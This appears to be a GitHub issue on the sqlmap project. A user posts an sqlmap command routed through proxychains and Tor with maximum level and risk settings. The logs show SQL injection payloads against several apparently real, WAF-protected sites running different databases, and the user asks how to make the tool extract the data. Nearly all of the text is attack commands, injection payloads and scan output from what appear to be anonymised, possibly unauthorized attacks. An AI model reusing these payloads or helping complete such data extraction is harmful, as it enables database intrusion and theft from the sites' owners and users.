sqlmap icon indicating copy to clipboard operation
sqlmap copied to clipboard

Published 20 hours ago verified publisher icon sqlmapproject

Sqlmap does not extract the data.

Open yusufalbashar opened this issue 1 year ago • 0 comments

After receiving a vulnerability alert and providing the payloads and the type of database system being used, sqlmap displays errors and stops. I have encountered the same error more than 20 times. Several scans have been shared below.

proxychains python3 sqlmap.py -u "https://example.com/" --random-agent 8 --dbs --banner --tor --level 5 --risk 3 

[19:03:54] [INFO] resuming back-end DBMS 'sybase'
[19:03:55] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=1MHMaMpwQg4...1783405633;isTopbarhw=false'). Do you want to use thossqlmap resumed the following injection point(s) from stored session:
---
Parameter: FORMSGROUP_ID__ (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload:
[19:03:57] [INFO] the back-end DBMS is Sybase
[19:03:57] [INFO] fetching banner
[19:03:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:03:57] [INFO] retrieved:
[19:03:59] [INFO] heuristics detected web page charset 'utf-8'

web application technology: JSP
[19:06:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:06:12] [INFO] fetching database names
[19:06:12] [INFO] retrieved:
[19:06:17] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'

[19:05:25] [INFO] resuming back-end DBMS 'sap maxdb'
[19:05:26] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ROUTEID=775a6c6ac73...a454f91d94;ROUTE=190513674.47873.0000;cookiesession1=678B286E82B...7259A337FB'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ln (GET)
    Type: boolean-based blind
    Title: SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)
    Payload: ln=javascript',(CASE WHEN 7835=7835 THEN 'javascript' ELSE NULL END)-- kxGG&v=fe11b8cc6e666409572f4e5ec10956abd0d559b9
---
[19:05:27] [INFO] the back-end DBMS is SAP MaxDB
[19:05:27] [INFO] fetching banner
[19:05:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:05:27] [INFO] retrieved:
back-end DBMS: SAP MaxDB
[19:06:44] [INFO] fetching banner
[19:06:44] [INFO] retrieved:
[19:06:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:06:47] [INFO] fetching database names
[19:06:47] [INFO] retrieved:
[19:06:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 95 times
[19:06:49] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'

[19:07:19] [INFO] resuming back-end DBMS 'postgresql'
[19:07:19] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('sess_map=ftduzsazczc...wcbxaxayfv'). Do you want to use those [Y/n] Y
[19:07:21] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: v (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: v=-3996) OR 9646=9646-- cFhG
---
[19:07:21] [INFO] the back-end DBMS is PostgreSQL
[19:07:21] [INFO] fetching banner
[19:07:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:07:21] [INFO] retrieved:
back-end DBMS: PostgreSQL (CockroachDB fork)
[19:08:20] [INFO] fetching banner
[19:08:20] [INFO] retrieved:
[19:08:26] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:08:26] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[19:08:26] [INFO] fetching database (schema) names
[19:08:26] [INFO] fetching number of databases
[19:08:26] [INFO] retrieved:
[19:08:29] [ERROR] unable to retrieve the number of databases
[19:08:29] [INFO] falling back to current database
[19:08:29] [INFO] fetching current database
[19:08:29] [INFO] retrieved:
[19:08:34] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[19:08:34] [CRITICAL] unable to retrieve the database names
[19:08:34] [WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 102 times
[19:08:34] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'

[21:23:32] [INFO] resuming back-end DBMS 'firebird'
[21:23:32] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('__uzma=d5d90482-d8...4779d74d9b;__uzmb=1708539812;__uzme=9174;__uzmc=420601040767;__uzmd=1708539812'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: arg (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: arg=-8049 OR 6019=6019
---
[21:23:32] [INFO] the back-end DBMS is Firebird
[21:23:32] [INFO] fetching banner
[21:23:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:23:33] [INFO] retrieved:
[21:26:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[21:26:11] [WARNING] on Firebird it is not possible to enumerate databases (use only '--tables')
[21:26:11] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'

[21:27:48] [INFO] resuming back-end DBMS 'mysql'
[21:27:48] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ASP.NET_SessionId=jqj5srm5lhg...rqlwinbmjq'). Do you want to use those [Y/n] Y
[21:27:52] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -5601 OR 8996=8996
---
[21:27:52] [INFO] the back-end DBMS is MySQL
[21:27:52] [INFO] fetching banner
[21:27:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:27:52] [INFO] retrieved:
[21:27:53] [CRITICAL] WAF/IPS identified as 'Kona Site Defender (Akamai Technologies)'
[21:27:53] [WARNING] potential permission problems detected ('Access Denied')

web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: MySQL 8 (MariaDB fork)
[21:28:04] [INFO] fetching banner
[21:28:04] [INFO] retrieved:
[21:28:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:28:05] [INFO] fetching database names
[21:28:05] [INFO] fetching number of databases
[21:28:05] [INFO] retrieved:
[21:28:05] [ERROR] unable to retrieve the number of databases
[21:28:05] [INFO] falling back to current database
[21:28:05] [INFO] fetching current database
[21:28:05] [INFO] retrieved:
[21:28:06] [CRITICAL] unable to retrieve the database names
[21:28:06] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 102 times
[21:28:06] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'

[20:22:50] [INFO] resuming back-end DBMS 'firebird'
[20:22:51] [INFO] testing connection to the target URL
[20:22:52] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxx.xxx.xxx.xxx (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: xxx.xxx.xxx.xxx=-3912 OR 2235=2235
---
[20:22:52] [INFO] the back-end DBMS is Firebird
[20:22:52] [INFO] fetching banner
[20:22:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:22:53] [INFO] retrieved:
[20:22:54] [CRITICAL] WAF/IPS identified as 'AppWall (Radware)'

back-end DBMS: Firebird 1.0
[20:23:53] [INFO] fetching banner
[20:23:53] [INFO] retrieved:
[20:23:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[20:23:58] [WARNING] on Firebird it is not possible to enumerate databases (use only '--tables')
[20:23:58] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'

What is the solution method for the problem?

yusufalbashar avatar Feb 21 '24 18:02 yusufalbashar